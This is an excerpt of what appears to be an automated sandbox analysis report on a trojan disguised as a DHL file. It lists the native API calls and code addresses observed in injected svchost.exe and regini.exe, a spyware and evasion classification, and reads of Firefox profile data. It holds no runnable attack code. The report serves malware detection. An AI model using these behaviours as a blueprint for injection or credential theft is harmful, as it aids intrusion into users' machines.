                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BF0 NtAllocateVirtualMemory,2_2_03A72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AB0 NtWaitForSingleObject,2_2_03A72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AF0 NtWriteFile,2_2_03A72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AD0 NtReadFile,2_2_03A72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A739B0 NtGetContextThread,2_2_03A739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FA0 NtQuerySection,2_2_03A72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FB0 NtResumeThread,2_2_03A72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F90 NtProtectVirtualMemory,2_2_03A72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FE0 NtCreateFile,2_2_03A72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F30 NtCreateSection,2_2_03A72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F60 NtCreateProcessEx,2_2_03A72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EA0 NtAdjustPrivilegesToken,2_2_03A72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E80 NtReadVirtualMemory,2_2_03A72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EE0 NtQueueApcThread,2_2_03A72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E30 NtWriteVirtualMemory,2_2_03A72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DB0 NtEnumerateKey,2_2_03A72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DD0 NtDelayExecution,2_2_03A72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D30 NtUnmapViewOfSection,2_2_03A72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D00 NtSetInformationFile,2_2_03A72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D10 NtMapViewOfSection,2_2_03A72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D10 NtOpenProcessToken,2_2_03A73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D70 NtOpenThread,2_2_03A73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CA0 NtQueryInformationToken,2_2_03A72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CF0 NtOpenProcess,2_2_03A72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CC0 NtQueryVirtualMemory,2_2_03A72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C00 NtQueryInformationProcess,2_2_03A72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C60 NtCreateKey,2_2_03A72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C70 NtFreeVirtualMemory,2_2_03A72C70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03074340 NtSetContextThread,LdrInitializeThunk,6_2_03074340
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03074650 NtSuspendThread,LdrInitializeThunk,6_2_03074650
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030735C0 NtCreateMutant,LdrInitializeThunk,6_2_030735C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072B60 NtClose,LdrInitializeThunk,6_2_03072B60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03072BA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03072BE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03072BF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072AD0 NtReadFile,LdrInitializeThunk,6_2_03072AD0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072AF0 NtWriteFile,LdrInitializeThunk,6_2_03072AF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030739B0 NtGetContextThread,LdrInitializeThunk,6_2_030739B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072F30 NtCreateSection,LdrInitializeThunk,6_2_03072F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072FB0 NtResumeThread,LdrInitializeThunk,6_2_03072FB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072FE0 NtCreateFile,LdrInitializeThunk,6_2_03072FE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03072E80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03072EE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03072D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03072D30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072DD0 NtDelayExecution,LdrInitializeThunk,6_2_03072DD0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03072DF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072C60 NtCreateKey,LdrInitializeThunk,6_2_03072C60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03072C70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03072CA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03073010 NtOpenDirectoryObject,6_2_03073010
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03073090 NtSetValueKey,6_2_03073090
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072B80 NtQueryInformationFile,6_2_03072B80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072AB0 NtWaitForSingleObject,6_2_03072AB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072F60 NtCreateProcessEx,6_2_03072F60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072F90 NtProtectVirtualMemory,6_2_03072F90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072FA0 NtQuerySection,6_2_03072FA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072E30 NtWriteVirtualMemory,6_2_03072E30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072EA0 NtAdjustPrivilegesToken,6_2_03072EA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072D00 NtSetInformationFile,6_2_03072D00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03073D10 NtOpenProcessToken,6_2_03073D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03073D70 NtOpenThread,6_2_03073D70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072DB0 NtEnumerateKey,6_2_03072DB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072C00 NtQueryInformationProcess,6_2_03072C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072CC0 NtQueryVirtualMemory,6_2_03072CC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03072CF0 NtOpenProcess,6_2_03072CF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028D93B0 NtCreateFile,6_2_028D93B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028D96D0 NtClose,6_2_028D96D0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028D9620 NtDeleteFile,6_2_028D9620
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028D9520 NtReadFile,6_2_028D9520
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028D9840 NtAllocateVirtualMemory,6_2_028D9840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004187832_2_00418783
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010D32_2_004010D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010E02_2_004010E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041697E2_2_0041697E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101E32_2_004101E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1E32_2_0040E1E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004169832_2_00416983
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3272_2_0040E327
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3332_2_0040E333
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004045AC2_2_004045AC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026502_2_00402650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EF732_2_0042EF73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FFC32_2_0040FFC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FB02_2_00402FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FFBF2_2_0040FFBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A8739A2_2_03A8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F02_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B003E62_2_03B003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D2_2_03AF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C2_2_03A2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA3522_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A02_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C02_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE02742_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4B1B02_2_03A4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B001AA2_2_03B001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF81CC2_2_03AF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A301002_2_03A30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA1182_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7516C2_2_03A7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F1722_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B16B2_2_03B0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF70E92_2_03AF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF0E02_2_03AFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF0CC2_2_03AEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C02_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF7B02_2_03AFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C02_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A407702_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A647502_2_03A64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C6E02_2_03A5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC2_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADD5B02_2_03ADD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B005912_2_03B00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A405352_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF75712_2_03AF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEE4F62_2_03AEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF43F2_2_03AFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A314602_2_03A31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF24462_2_03AF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FB802_2_03A5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7DBF92_2_03A7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF6BD72_2_03AF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFB762_2_03AFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFAB402_2_03AFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADDAAC2_2_03ADDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A85AA02_2_03A85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA802_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEDAC62_2_03AEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB3A6C2_2_03AB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFA492_2_03AFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7A462_2_03AF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A02_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0A9A62_2_03B0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A569622_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A499502_2_03A49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B9502_2_03A5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A268B82_2_03A268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A438E02_2_03A438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E8F02_2_03A6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD8002_2_03AAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A428402_2_03A42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4A8402_2_03A4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFFB12_2_03AFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41F922_2_03A41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4CFE02_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32FC82_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A82F282_2_03A82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60F302_2_03A60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFF092_2_03AFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4F402_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A49EB02_2_03A49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52E902_2_03A52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFCE932_2_03AFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEEDB2_2_03AFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEE262_2_03AFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40E592_2_03A40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A58DBF2_2_03A58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3ADE02_2_03A3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FDC02_2_03A5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4AD002_2_03A4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7D732_2_03AF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43D402_2_03A43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF1D5A2_2_03AF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0CB52_2_03AE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30CF22_2_03A30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFCF22_2_03AFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB9C322_2_03AB9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40C002_2_03A40C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030F132D6_2_030F132D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0302D34C6_2_0302D34C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FA3526_2_030FA352
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0308739A6_2_0308739A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0304E3F06_2_0304E3F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_031003E66_2_031003E6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030E02746_2_030E0274
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030452A06_2_030452A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0305B2C06_2_0305B2C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030E12ED6_2_030E12ED
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030301006_2_03030100
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030DA1186_2_030DA118
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0307516C6_2_0307516C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0302F1726_2_0302F172
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0310B16B6_2_0310B16B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0304B1B06_2_0304B1B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_031001AA6_2_031001AA
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030F81CC6_2_030F81CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030EF0CC6_2_030EF0CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030470C06_2_030470C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030F70E96_2_030F70E9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FF0E06_2_030FF0E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030647506_2_03064750
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030407706_2_03040770
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FF7B06_2_030FF7B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0303C7C06_2_0303C7C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030F16CC6_2_030F16CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0305C6E06_2_0305C6E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030405356_2_03040535
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030F75716_2_030F7571
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_031005916_2_03100591
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030DD5B06_2_030DD5B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FF43F6_2_030FF43F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030F24466_2_030F2446
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030314606_2_03031460
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030EE4F66_2_030EE4F6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FAB406_2_030FAB40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FFB766_2_030FFB76
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0305FB806_2_0305FB80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030F6BD76_2_030F6BD7
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0307DBF96_2_0307DBF9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FFA496_2_030FFA49
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030F7A466_2_030F7A46
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030B3A6C6_2_030B3A6C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0303EA806_2_0303EA80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030DDAAC6_2_030DDAAC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03085AA06_2_03085AA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030EDAC66_2_030EDAC6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030499506_2_03049950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0305B9506_2_0305B950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030569626_2_03056962
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030429A06_2_030429A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0310A9A66_2_0310A9A6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030428406_2_03042840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0304A8406_2_0304A840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030268B86_2_030268B8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030438E06_2_030438E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0306E8F06_2_0306E8F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FFF096_2_030FFF09
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03060F306_2_03060F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030B4F406_2_030B4F40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03041F926_2_03041F92
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FFFB16_2_030FFFB1
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03032FC86_2_03032FC8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0304CFE06_2_0304CFE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FEE266_2_030FEE26
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03040E596_2_03040E59
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03052E906_2_03052E90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FCE936_2_030FCE93
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03049EB06_2_03049EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FEEDB6_2_030FEEDB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0304AD006_2_0304AD00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03043D406_2_03043D40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030F1D5A6_2_030F1D5A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030F7D736_2_030F7D73
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03058DBF6_2_03058DBF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0305FDC06_2_0305FDC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0303ADE06_2_0303ADE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03040C006_2_03040C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030B9C326_2_030B9C32
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030E0CB56_2_030E0CB5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03030CF26_2_03030CF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FFCF26_2_030FFCF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028C1EA06_2_028C1EA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028B13796_2_028B1379
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BB0F46_2_028BB0F4
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BB1006_2_028BB100
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028C374B6_2_028C374B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028C37506_2_028C3750
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028C55506_2_028C5550
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BAFB06_2_028BAFB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BCFB06_2_028BCFB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BCD8C6_2_028BCD8C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BCD906_2_028BCD90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028DBD406_2_028DBD40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EEE3A86_2_02EEE3A8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EEE4C56_2_02EEE4C5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EECBB86_2_02EECBB8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EEE85C6_2_02EEE85C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EED9286_2_02EED928
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 030AEA12 appears 84 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 0302B970 appears 266 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 030BF290 appears 105 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 03075130 appears 36 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 03087E54 appears 88 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 268 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 89 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 36 times
                Source: DHL_734825510.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@15/9
                Source: C:\Users\user\Desktop\DHL_734825510.exeFile created: C:\Users\user\AppData\Local\Temp\aut5BF.tmpJump to behavior
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
